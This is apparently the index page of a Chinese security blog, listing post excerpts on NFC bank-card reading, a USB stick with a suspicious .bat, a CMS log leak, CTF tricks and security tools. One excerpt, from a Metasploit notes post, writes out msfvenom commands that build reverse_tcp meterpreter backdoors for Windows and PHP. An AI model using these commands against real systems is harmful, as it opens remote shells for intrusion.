安云
-
使用python读取银行卡信息
1 银行卡敏感信息?之前网上有所谓专家认为,NFC手机有可能成为黑客的“提款机”;也有分析认为,手机只有紧贴着银行卡才能读出有限的卡内信息,也并不能进行转账操作,因此风险并不大。看了这么多,不如自己用python读取一下,看看到底能读取到什...
-
-
来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种
在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后...
-
CRMEB最新版敏感日志泄露
前言基于ThinkPhp5.0+Vue+EasyWeChat 开发的一套CRMEB新零售商城系统CRMEB系统就是集客户关系管理+营销电商系统,能够真正帮助企业基于微信公众号、小程序、wap、pc、app等,实现会员管理、数据分析,精准营销...
-
Fwanalyzer:文件系统镜像分析工具
FwAnalyzer是一个使用一组可配置规则分析(ext2/3/4),FAT/VFat,SquashFS,UBIFS文件系统镜像和目录内容的工具。FwAnalyzer依赖于e2tools用于ext文件系统,mtools用于FAT文件系统,s...
-
DNSlivery:通过DNS发送文件和payload的工具
前言DNSlivery是一款使用DNS作为传输协议将文件传递到目标的工具。特点1.执行或上传文件到目标机器2.目标上的不需要任何客户端3.不需要完整的DNS服务器它可以轻松地将文件或payload传送到受损目标,不需要使用传统的Web传输,...
-
来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种
在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后...
-
CTF之md5截断比较验证填坑
背景CTF有个特别狗,也特别烦的东西,就是MD5截断验证,今天我就遇到了.正文嗯,举个栗子啥意思呢?就是说,验证明文(Code)+随机字符串(fTyHgZII)在md5加密之后截取前六位等于b77333来,看效果注释有了,按题目需求,直接改...
-
Metasploit笔记
生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe生成PHP后门msfvenom -p php/meterpre...
-
Cloud-Security-Audit:一款基于Go的AWS命令行安全审计工具
cloud-security-audit是一款适用于AWS的命令行安全审计工具。它可以帮助你扫描AWS账户中的漏洞,你将能够快速识别基础架构中不安全的部分,并执行对AWS账户的审计工作。安装目前,Cloud Security Audit不支...
最新留言
赞作者,我想加你扣扣怎么加?
比较简单的呢
博主也可以教一下有趣的技术吗?
ACR122U是什么??
顶
感谢
感谢
好可怜。。。